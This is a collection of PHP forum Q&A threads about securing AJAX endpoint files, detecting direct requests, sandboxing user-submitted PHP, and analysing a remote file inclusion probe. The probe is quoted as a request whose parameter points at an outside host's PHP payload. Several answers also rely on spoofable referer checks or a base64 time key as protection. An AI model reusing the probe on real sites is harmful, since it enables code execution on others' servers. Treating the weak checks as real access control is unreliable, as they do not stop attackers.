How to secure sensitive PHP files that process Jquery data? - php

On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Even though someone could browse to www.mysite.com/search_user_data.php, all of the data processed is properly escaped and handled, but on a professional level this is inadequate to even have this file within public reach.
I have tried moving the sensitive files to my web root, however since Jquery is making $.get requests and passing variables in the URL, this doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?

What you describe is normal.
You have PHP files that are reachable in your www directory so apache (or your favored webserver) can read and process them.
If you move them out you can't reach them anymore so there is no real option of that sort.
After all your PHP files for AJAX are just regular php files, likely your other project also contains php files. Right ? They are not more or less at risk than any script on your server.
Make sure you program "clean". Think about evil requests when writing your php functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: You'll regularly receive warnings because some companies automatically scan websites for possible bugs. So you will receive a warning on such scans as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, some proxies filter that. (I personally would ignore them, half the (www) internet breaks on them anyway)
One more layer of protection can be added by htaccess, you can do most within PHP but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html

You can store a uid each time your page is loaded and store it in $_SESSION['uid']. You give this uid to javascript by doing :
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it with your get request, compare it to your $_SESSION :
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.

Related

Ajax verify page before executing

I have an ajax.php file to which all of my ajax calls point with an extra parameter of the script the current call demands to execute. My problem is that I want to limit some scripts to being executed by specific pages only, say for example sendComment.php should only be called from www.mysite.com/user/{any user}.
What I have done is put this code on top of every script that I want to limit:
if(strstr($_SERVER['HTTP_REFERRER'],'mysite.com/{page_allowed_to_exec_script}'){
Then do stuff here
}
But what I've come to notice is that not all browsers support the HTTP_REFERRER ( I might have spelled that incorrectly, I'm writing this by memory ), and as well as not being cross-browser it's also a pain in the butt having to hardcode this stuff in all of the files and is going to be an even bigger pain when it comes to changing stuff.. I'm looking for a way I can possibly have all the scripts in an array with all the pages that are able to execute them, and perform a check in the ajax.php file at start.
Does anyone have any idea how this can be achieved?
Even all browsers may not send "referer" because of some kind of "proxy","firewall" or "security" suite strips it out or even changes it.So you can trust on it.
If you control the referring page you can use sessions, cookies or the URL to pass the information if you feel it's that vital. If it's absolutely vital, your only option is sessions. The other two can easily be removed.

how to prevent 'manual execution' of external PHP script

In simplest terms, I utilize external PHP scripts throughout my client's website for various purposes such as getting search results, updating content, etc.
I keep these scripts in a directory:
www.domain.com/scripts/scriptname01.php
www.domain.com/scripts/scriptname02.php
www.domain.com/scripts/scriptname03.php
etc..
I usually execute them using jQuery AJAX calls.
What I'm trying to do is find is a piece of code that will detect (from within) whether these scripts are being executed from a file via AJAX or MANUALLY via URL by the user.
IS THIS POSSIBLE??
I've have searched absolutely everywhere and tried various methods to do with the $_SERVER[] array but still no success.
What I'm trying to do is find is a piece of code that will detect (from within) whether these scripts are being executed from a file via AJAX or MANUALLY via URL by the user.
IS THIS POSSIBLE??
No, not with 100% reliability. There's nothing you can do to stop the client from simulating an Ajax call.
There are some headers you can test for, though, namely X-Requested-With. They would prevent an unsophisticated user from calling your Ajax URLs directly. See Detect Ajax calling URL
Most AJAX frameworks will send an X-Requested-With: header. Assuming you are running on Apache, you can use the apache_request_headers() function to retrieve the headers and check for it/parse it.
Even so, there is nothing preventing someone from manually setting this header - there is no real 100% foolproof way to detect this, but checking for this header is probably about as close as you will get.
Depending on what you need to protect and why, you might consider requiring some form of authentication, and/or using a unique hash/PHP sessions, but this can still be reverse engineered by anyone who knows a bit about Javascript.
As an idea of things that you can verify, if you verify all of these before servicing you request it will afford a degree of certainty (although not much, none if someone is deliberately trying to cirumvent your system):
Store unique hash in a session value, and require it to be sent back to you by the AJAX call (in a cookie or a request parameter) so can compare them at the server side to verify that they match
Check the X-Requested-With: header is set and the value is sensible
Check that the User-Agent: header is the same as the one that started the session
The more things you check, the more chance an attacker will get bored and give up before they get it right. Equally, the longer/more system resources it will take to service each request...
There is no 100% reliable way to prevent a user, if he knows the address of your request, from invoking your script.
This is why you have to authenticate every request to your script. If your script is only to be called by authenticated users, check for the authentication again in your script. Treat it as you will treat incoming user input - validate and sanitize everything.
On Edit: The same could be said for any script which the user can access through the URL. For example, consider profile.php?userid=3

Best way to allow user to inject and run php code

I've been thinking for a while about the idea of allowing user to inject code on website and run it on a web server. It's not a new idea - many websites allow users to "test" their code online - such as http://ideone.com/.
For example: Let's say that we have a form containing <textarea> element in which that user enters his piece of code and then submits it. Server reads POST data, saves as PHP file and require()s it while being surrounded by ob_*() output buffering handlers. Captured output is presented to end user.
My question is: how to do it properly? Things that we should take into account [and possible solutions]:
security, user is not allowed to do anything evil,
php.ini's disable_functions
stability, user is not allowed to kill webserver submitting while(true){},
set_time_limit()
performance, server returns answer in an acceptable time,
control, user can do anything that matches previous points.
I would prefer PHP-oriented answers, but general approach is also welcome. Thank you in advance.
I would think about this problem one level higher, above and outside of the web server. Have a very unprivileged, jailed, chroot'ed standalone process for running these uploaded PHP scripts, then it doesn't matter what PHP functions are enabled or not, they will fail based on permissions and lack of access.
Have a parent process that monitors how long the above mentioned "worker" process has been running, if its been too long, kill it, and report back a timeout error to the end user.
Obviously there are many implementation details to work out as to how to run this system asynchronously outside of the browser request, but I think it would provide a pretty secure way to run your untrusted PHP scripts.
Wouldn't disabling functions in your server's ini file limit some of the functions of the application itself?
I think you have to do some hardcore sanitization on the POST data and strip "illegal" code there. I think doing that with the addition of the other methods you describe might make it work.
Just remember. Sanitize the everloving daylight out of that POST data.

What bug does this hacker want to exploit?

A guy called ShiroHige is trying to hacking my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file it is just a die(),
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying use RFI.
Is there some popular script that are exploitable with that (Drupal, phpBB, etc.)?
An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks one have to strictly sanitize filenames, if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using basename() function:
if (empty($_GET['page']))
$_GET['page']="index.php";
$page = $modules_dir.basename($_GET['page']).".php";
if (!is_readable($page)) {
header("HTTP/1.0 404 Not Found");
$page="404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being, that is you use include, but do not sanitize your input, then the php in this text file is executed. If this works, then he can send any php code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there’s a way to get into WordPress, it would be very public by now.
I think its only a first test if your site is vulnerable to external includes. If the echo is printed, he knows its possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as i entered it into my browser, Avast antivirus claimed it to be a malicious url. So that php code may be deceiving or he may just be testing. Other possibility is that the hacker has no bad intentions and just want to show that he could get over your security.

How to deny direct access to files in AJAX directory

I have several pages that call in content via jQuery .ajax. I dont want the content visible on the page so thats why I went with .ajax and not showing/hiding the content. I want to protect the files inside the AJAX directory from being directly accessible through the browser url. I know that PHP headers can be spoofed and dont know if it is better to use an "access" key or try doing it via htaccess.
My question is what is the more reliable method? There is no logged on/non logged user status, and the main pages need to be able to pull in content from the pages in the AJAX directories.
thx
Make a temporary time-coded session variable. Check the variable in the php output file before echoing the data.
OR, if you don't want to use sessions.. do this:
$key = base64encode(time().'abcd');
in the read file:
base64decode
explode by abcd
read the time. Allow 5 seconds buffer. If the time falls within 5 seconds of the stamped request. You are legit.
To make it more secure, you can change your encrypting / decrypting mechanism.
I would drop this idea because there is no secure way to do it.
Your server will never be able to tell apart a "real" Ajax request from a "faked" one, as every aspect of the request can be forged on client side. An attacker will just have to look into a packet filter to see what requests your page makes. It is trivial to replicate the requests.
Any solution you work out will do nothing but provide a false sense of security. If you have data you need to keep secret, you will need to employ some more efficient protection like authentication.
Why not have the content be outside the webserver directory, and then have a php script that can validate if the person should see it, and then send it to them.
So, you have getcontent.php, and you can look at a cookie, or a token that was given to the javascript page and it uses to do the request, and then it will just fetch the real content, set the mime types and stream it to the user.
This way you can change your logic as to who should have access, without changing any of the rest of your application.
There is no real difference to having http://someorg.net/myimage.gif and http://someorg.net/myscript.php?token=887799&img_id=ddtw88 to the browser, but obviously it will need to work with GET so a time limited value is necessary as the user can see reuse it.

Categories